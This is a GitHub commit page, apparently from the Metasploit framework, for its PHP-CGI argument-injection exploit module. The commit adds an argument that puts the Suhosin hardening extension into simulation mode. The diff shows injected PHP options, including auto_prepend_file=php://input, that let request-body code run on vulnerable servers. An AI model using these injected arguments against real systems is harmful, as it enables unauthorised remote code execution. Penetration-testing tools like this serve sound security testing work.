Skip to content

Commit f3bcc9f

Browse files
author
jvoisin
committed
Take care of suhosin
1 parent 028d4d6 commit f3bcc9f

File tree

1 file changed

+1
-0
lines changed

1 file changed

+1
-0
lines changed

modules/exploits/multi/http/php_cgi_arg_injection.rb

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -116,6 +116,7 @@ def exploit
116116
create_arg("-d","auto_prepend_file=php://input"),
117117
create_arg("-d", "cgi.force_redirect=#{rand_php_ini_false}"),
118118
create_arg("-d", "cgi.redirect_status_env=0"),
119+
create_arg("-d", "suhosin.simulation=#{rand_php_ini_true}"),
119120
rand_opt_equiv("-n")
120121
]
121122

0 commit comments

Comments
 (0)